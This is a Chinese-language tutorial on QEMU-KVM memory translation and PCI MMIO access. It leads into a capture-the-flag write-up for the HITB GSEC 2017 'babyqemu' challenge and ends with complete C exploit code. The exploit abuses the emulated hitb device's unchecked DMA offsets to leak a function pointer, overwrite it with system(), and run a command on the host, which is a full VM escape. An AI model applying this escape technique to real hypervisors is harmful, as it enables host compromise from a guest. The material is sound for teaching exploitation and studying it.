Qemu-kvm原理
Qemu
是一个通用的开源机器模拟器和虚拟器- 模拟各种架构的硬件,使用二进制翻译技术
- 创建虚拟机,通过
ioctl
与内核KVM
模块进行交互
Qemu
为每个虚拟机创建一个进程,进程中,为每个虚拟CPU
创建一个线程,Guest
系统和应用都运行在虚拟CPU
中
Qemu
可以模拟I/O
处理,执行流程:虚拟机中进行I/O
操作 → 进入KVM → KVM进行判断处理并将控制权交给Qemu
,由Qemu来模拟I/O
设备去响应虚拟机中的I/O
请求
KVM
是Linux
系统的内核模块,实现CPU
的虚拟化、内存的虚拟化
内存布局
- GVA : guest virtual address 虚拟机中的虚拟地址
- GPA : guest physical address 虚拟机中的物理地址
- HVA : host virtual address 宿主机中的虚拟地址
- HPA : host physical address 宿主机中的物理地址
示意图如下所示:
Guest' processes
+--------------------+
Virtual addr space | |
+--------------------+ (GVA)
| |
\__ Page Table \__
\ \
| | Guest kernel
+----+--------------------+----------------+
Guest's phy memory | | | | (GPA)
+----+--------------------+----------------+
| |
\__ \__
\ \
| QEMU process |
+----+------------------------------------------+
Virtual addr space | | | (HVA)
+----+------------------------------------------+
| |
\__ Page Table \__
\ \
| |
+----+-----------------------------------------------+----+
Physical memory | | | | (HPA)
+----+-----------------------------------------------+----+
地址转换:GVA → GPA → HVA → HPA
GPA是宿主机进程mmap出来的内存
测试代码:
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) //4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
int fd;
uint64_t page_offset(uint64_t addr)
{
return addr & ((1 << PAGE_SHIFT) - 1);
}
uint64_t gva_to_gfn(void *addr)
{
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}
uint64_t gva_to_gpa(void *addr)
{
uint64_t gfn = gva_to_gfn(addr);//这里的addr属于gva,获取对应的page frame number
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);//返回对应的GPA
}
int main()
{
uint8_t *ptr;
uint64_t ptr_mem;
fd = open("/proc/self/pagemap", O_RDONLY); //通过读取pagemap文件,可以得到进程从虚拟地址到物理地址映射的信息
if (fd < 0) {
perror("open");
exit(1);
}
ptr = malloc(256); //首先开256的空间
strcpy(ptr, "Where am I?"); //将字符串拷贝过去
printf("%s\n", ptr);
ptr_mem = gva_to_gpa(ptr); //guest virtual mem -> guest physicals mem
//此时的ptr_mem对应的是虚拟机里字符串所在的物理内存地址。
printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem);
getchar();
return 0;
}
编译命令:
gcc mmu.c -static -o mmu
Qemu来启动一个虚拟机,把编译好的程序放进去运行
再通过
gdb attach
到qemu
的进程上,search
查找字符串计算起始地址:
>>> hex(0x7fb153819880-0x3a19880)
'0x7fb14fe00000'
>>>
在
gdb
中使用vmmap
命令查看qemu
的地址空间综上所述,
0x7fb14fe00000
就是虚拟机物理地址为0的位置。DMA
DMA本身不属于某一类外设,它是一种外设与内存传输数据的方式。
PCI设备地址空间
PCI可以申请两类地址空间,分别是
memory space
和 I/O space
通过
memory space
访问设备I/O
的方式称为memory mapped I/O
即MMIO
,在MMIO
中,内存和I/O
设备共享同一个地址空间。Qemu中访问I/O空间
用户态访问,通过映射
resource0
文件实现内存的访问#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include<sys/io.h>
unsigned char* mmio_mem;
void die(const char* msg)
{
perror(msg);
exit(-1);
}
void mmio_write(uint32_t addr, uint32_t value)
{
*((uint32_t*)(mmio_mem + addr)) = value;
}
uint32_t mmio_read(uint32_t addr)
{
return *((uint32_t*)(mmio_mem + addr));
}
int main(int argc, char *argv[])
{
// Open and map I/O memory for the strng device
int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
if (mmio_fd == -1)
die("mmio_fd open failed");
mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
if (mmio_mem == MAP_FAILED)
die("mmap mmio_mem failed");
printf("mmio_mem @ %p\n", mmio_mem);
mmio_read(0x128);
mmio_write(0x128, 1337);
}
hitb gesc 2017 babyqemu 逃逸
题目附件信息:
❯ ls -al
总用量 51524
drwxr-xr-x 4 root root 4096 Oct 21 11:54 .
drwx------ 88 root root 4096 Oct 21 12:08 ..
drwxr-xr-x 17 root root 4096 Oct 20 14:54 file #rootfs.cpio 解压出来的文件系统
-rwxr-xr-x 1 root root 291 Oct 21 11:52 launch.sh#启动VM命令
drwxr-xr-x 6 root root 4096 Jul 11 2017 pc-bios
-rwxr-xr-x 1 root root 39682064 Jul 11 2017 qemu-system-x86_64
-rw-r--r-- 1 root root 5734400 Oct 21 11:49 rootfs.cpio#文件系统
-rwxr-xr-x 1 root root 7308672 Jul 11 2017 vmlinuz-4.8.0-52-generic#linux内核文件
启动命令:
❯ cat launch.sh
#! /bin/sh
./qemu-system-x86_64 \
-initrd ./rootfs.cpio \
-kernel ./vmlinuz-4.8.0-52-generic \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-enable-kvm \
-monitor /dev/null \
-m 64M --nographic -L ./dependency/usr/local/share/qemu \
-L pc-bios \
-device hitb,id=vda
关键点是
-device hitb
,表明了该VM系统中存在一个hitb
驱动设备把
qemu-system-x86_64
载入IDA中,发现是是存在符号的,通过函数名中的关键字筛选出一些关键函数如下所示:首先看函数
pci_hitb_register_types
,该函数是进行PCI设备注册void __cdecl pci_hitb_register_types()
{
type_register_static(&hitb_info_27046);
}
通过查看
hitb_info_27046
,得到class_init和instance_init对应的实例在local_type中通过搜索关键字找到相关的结构体
在
hitb_class_init
函数中,设置了PCI配置的一些信息void __fastcall hitb_class_init(ObjectClass_0 *a1, void *data)
{
PCIDeviceClass *v2; // rax
v2 = object_class_dynamic_cast_assert(
a1,
&stru_64A230.bulk_in_pending[2].data[72],
&stru_5AB2C8.msi_vectors,
469,
"hitb_class_init");
v2->revision = 16;
v2->class_id = 255;
v2->realize = pci_hitb_realize;
v2->exit = pci_hitb_uninit;
v2->vendor_id = 0x1234;
v2->device_id = 0x2333;
}
运行VM,使用
lspci
命令查看pci
设备,可以看到最后一个就是hitb
Welcome to HITB
HITB login: root
# lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333
#
hitb_instance_init函数中初始化了
HitbState->enc
的初始值void __fastcall hitb_instance_init(Object_0 *obj)
{
HitbState *v1; // rax
v1 = object_dynamic_cast_assert(
obj,
&stru_5AB2C8.not_legacy_32bit + 12,
&stru_5AB2C8.msi_vectors,
459,
"hitb_instance_init");
v1->dma_mask = 0xFFFFFFFLL;
v1 = (v1 + 7104);
*(&v1[-1].dma_mask + 1) = hitb_enc; // 初始化了HitbState结构中enc的地址
object_property_add(
obj,
&stru_5AB2C8.server_bar2.coalesced.tqh_first + 3,
"uint64",
hitb_obj_uint64,
hitb_obj_uint64,
0LL,
v1,
0LL);
}
pci_hitb_realize
函数中,首先是添加了一个qemu-timer
,也就是说,会定时执行指定函数。此处该函数是hitb_dma_timer
,接着注册了hitb_mmio_ops
结构体,指明了读写时具体是哪个函数操作的。分别是hitb_mmio_read
和hitb_mmio_write
hitb_mmio_read
函数中,第二个参数决定函数返回哪块区域内存。uint64_t __fastcall hitb_mmio_read(HitbState *opaque, hwaddr addr, unsigned int size)
{
uint64_t result; // rax
uint64_t val; // [rsp+0h] [rbp-20h]
result = -1LL;
if ( size == 4 )
{
if ( addr == 128 )
return opaque->dma.src;
if ( addr > 0x80 )
{
if ( addr == 140 )
return *(dma_addr_t *)((char *)&opaque->dma.dst + 4);
if ( addr <= 0x8C )
{
if ( addr == 132 )
return *(dma_addr_t *)((char *)&opaque->dma.src + 4);
if ( addr == 136 )
return opaque->dma.dst;
}
else
{
if ( addr == 144 )
return opaque->dma.cnt;
if ( addr == 152 )
return opaque->dma.cmd;
}
}
else
{
if ( addr == 8 )
{
qemu_mutex_lock(&opaque->thr_mutex);
val = opaque->fact;
qemu_mutex_unlock(&opaque->thr_mutex);
return val;
}
if ( addr <= 8 )
{
result = 16777453LL;
if ( !addr )
return result;
if ( addr == 4 )
return opaque->addr4;
}
else
{
if ( addr == 32 )
return opaque->status;
if ( addr == 36 )
return opaque->irq_status;
}
}
result = -1LL;
}
return result;
}
hitb_mmio_write
函数中,第二个参数决定要改的区域,第三个参数决定值。- addr=0x80 , opaque->dma.src = val
- addr=0x84 , *(dma_addr_t *)((char *)&opaque->dma.src + 4) = val
- addr=0x88 , opaque->dma.dst = val
- addr=0x8c , *(dma_addr_t *)((char *)&opaque->dma.dst + 4) = val;
- addr=0x90 , opaque->dma.cnt = val;
- addr=0x98 , opaque->dma.cmd = val;并调用timer_mod激活定时器
hitb_dma_timer
函数中根据 opaque->dma.cmd
的值来决定做什么操作- opaque->dma.cmd=1|2|4时,先设置
v2 = (unsigned int)(LODWORD(opaque->dma.src) - 0x40000);
,接着执行opaque->enc(&opaque->dma_buf[v2], opaque->dma.cnt);
调用cpu_physical_memory_rw
函数将&opaque->dma_buf[v2]
拷贝到opaque->dma.dst
拷贝长度为opaque->dma.cnt
- opaque->dma.cmd=1|2时,不加密,直接拷贝
- opaque->dma.cmd=1|0时,从src中长度为cnt的内容拷贝到dma_buf中
漏洞所在dma.src是我们可以控制的,利用
dma.cmd=1|2|4
可以任意地址读,利用dma.cmd=1|0
可以实现任意地址写enc函数指着在buf之后,并且可以控制程序能够执行到enc函数,攻击思路就可以enc函数指针覆盖成system,参数
&opaque->dma_buf[v2];
改成想要执行的命令即可。exp:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <ctype.h>
#include <termios.h>
#include <assert.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/io.h>
#define MAP_SIZE 4096UL
#define MAP_MASK (MAP_SIZE - 1)
#define DMA_BASE 0x40000
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
char* pci_device_name = "/sys/devices/pci0000:00/0000:00:04.0/resource0";
unsigned char* tmpbuf;
uint64_t tmpbuf_phys_addr;
unsigned char* mmio_base;
unsigned char* getMMIOBase(){
int fd;
if((fd = open(pci_device_name, O_RDWR | O_SYNC)) == -1) {
perror("open pci device");
exit(-1);
}
mmio_base = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
if(mmio_base == (void *) -1) {
perror("mmap");
exit(-1);
}
return mmio_base;
}
// 获取页内偏移
uint32_t page_offset(uint32_t addr)
{
// addr & 0xfff
return addr & ((1 << PAGE_SHIFT) - 1);
}
uint64_t gva_to_gfn(void *addr)
{
uint64_t pme, gfn;
size_t offset;
int fd;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
// printf("pfn_item_offset : %p\n", (uintptr_t)addr >> 9);
offset = ((uintptr_t)addr >> 9) & ~7;
////下面是网上其他人的代码,只是为了理解上面的代码
//一开始除以 0x1000 (getpagesize=0x1000,4k对齐,而且本来低12位就是页内索引,需要去掉),即除以2**12, 这就获取了页号了,
//pagemap中一个地址64位,即8字节,也即sizeof(uint64_t),所以有了页号后,我们需要乘以8去找到对应的偏移从而获得对应的物理地址
//最终 vir/2^12 * 8 = (vir / 2^9) & ~7
//这跟上面的右移9正好对应,但是为什么要 & ~7 ,因为你 vir >> 12 << 3 , 跟vir >> 9 是有区别的,vir >> 12 << 3低3位肯定是0,所以通过& ~7将低3位置0
// int page_size=getpagesize();
// unsigned long vir_page_idx = vir/page_size;
// unsigned long pfn_item_offset = vir_page_idx*sizeof(uint64_t);
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
// 确保页面存在——page is present.
if (!(pme & PFN_PRESENT))
return -1;
// physical frame number
gfn = pme & PFN_PFN;
return gfn;
}
uint64_t gva_to_gpa(void *addr)
{
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}
void mmio_write(uint64_t addr, uint64_t value)
{
*((uint64_t*)(mmio_base + addr)) = value;
}
uint64_t mmio_read(uint64_t addr)
{
return *((uint64_t*)(mmio_base + addr));
}
void set_cnt(uint64_t val)
{
mmio_write(144, val);
}
void set_src(uint64_t val)
{
mmio_write(128, val);
}
void set_dst(uint64_t val)
{
mmio_write(136, val);
}
void start_dma_timer(uint64_t val){
mmio_write(152, val);
}
void dma_read(uint64_t offset, uint64_t cnt){
// 设置dma_buf的索引
set_src(DMA_BASE + offset);
// 设置读取后要写入的物理地址
set_dst(tmpbuf_phys_addr);
// 设置读取的大小
set_cnt(cnt);
// 触发hitb_dma_timer
start_dma_timer(1|2);
// 等待上面的执行完
sleep(1);
}
void dma_write(uint64_t offset, char* buf, uint64_t cnt)
{
// 将我们要写的内容先复制到tmpbuf
memcpy(tmpbuf, buf, cnt);
//设置物理地址(要从这读取写到dma_buf[opaque->dma.dst-0x40000])
set_src(tmpbuf_phys_addr);
// 设置dma_buf的索引
set_dst(DMA_BASE + offset);
// 设置写入大小
set_cnt(cnt);
// 触发hitb_dma_timer
start_dma_timer(1);
// 等待上面的执行完
sleep(1);
}
void dma_write_qword(uint64_t offset, uint64_t val)
{
dma_write(offset, (char *)&val, 8);
}
void dma_enc_read(uint64_t offset, uint64_t cnt)
{
// 设置dma_buf的索引
set_src(DMA_BASE + offset);
// 设置读取后要写入的物理地址
set_dst(tmpbuf_phys_addr);
// 设置读取的大小
set_cnt(cnt);
// 触发hitb_dma_timer
start_dma_timer(1|2|4);
// 等待上面的执行完
sleep(1);
}
int main(int argc, char const *argv[])
{
getMMIOBase();
printf("mmio_base Resource0Base: %p\n", mmio_base);
tmpbuf = malloc(0x1000);
tmpbuf_phys_addr = gva_to_gpa(tmpbuf);
printf("gva_to_gpa tmpbuf_phys_addr %p\n", (void*)tmpbuf_phys_addr);
//just test
// dma_write(0, "giantbranch", 11);
// dma_read(0, 11);
// printf("tmpbuf: %s\n", tmpbuf);
// 将enc函数指针写到tmpbuf_phys_addr,之后通过tmpbuf读出即可
dma_read(4096, 8);
uint64_t hitb_enc_addr = *((uint64_t*)tmpbuf);
uint64_t binary_base_addr = hitb_enc_addr - 0x283DD0;
uint64_t system_addr = binary_base_addr + 0x1FDB18;
printf("hitb_enc_addr: 0x%lx\n", hitb_enc_addr);
printf("binary_base_addr: 0x%lx\n", binary_base_addr);
printf("system_addr: 0x%lx\n", system_addr);
// 覆盖enc函数指针为system地址
dma_write_qword(4096, system_addr);
// 将我们要执行的命令复制到tmpbuf中
// char* command = "gnome-calculator";
// char* command = "pwd";
char* command = "uname -a";
dma_write(0x200, command, strlen(command));
// 触发hitb_dma_timer中的enc函数,从而调用syetem
// 下面的666设置的是cnt,可以是任意值,没什么影响
dma_enc_read(0x200, 666);
return 0;
}
攻击效果: